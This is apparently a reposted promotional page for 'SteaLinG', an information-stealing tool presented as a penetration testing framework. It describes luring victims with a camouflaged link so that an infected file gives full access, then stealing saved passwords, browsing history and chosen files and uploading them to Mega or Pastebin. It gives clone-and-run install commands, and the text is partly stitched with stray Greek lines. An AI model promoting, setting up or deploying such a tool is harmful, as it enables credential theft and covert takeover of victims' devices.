SteaLinG is an open source penetration testing framework designed for social engineering attacks. After the attack is over, you can upload a shell to the victim's device and gain full access to their device.
Simply put, we send a well-camouflaged link to the victim, where as soon as he clicks on it, the infected file is downloaded to the motherboard, in order to give us full access to the victim's device.
Characteristics
- Intercept saved passwords and upload saved passwords file to Mega or Pastebin.
- Browser history interception.
- Steal files from the device with the extension you want.
Roadmap
System requirements
- Python >= 3.8+
- Operating System: Windows (the victim)
- OS: Linux
Installation on Windows:
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
Installation on Linux
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
Ανίχνευση AV
Μπορείτε να κατεβάσετε το πρόγραμμα από εδώ.

Why does the Linux installation have to run python as an .exe with wine? LOL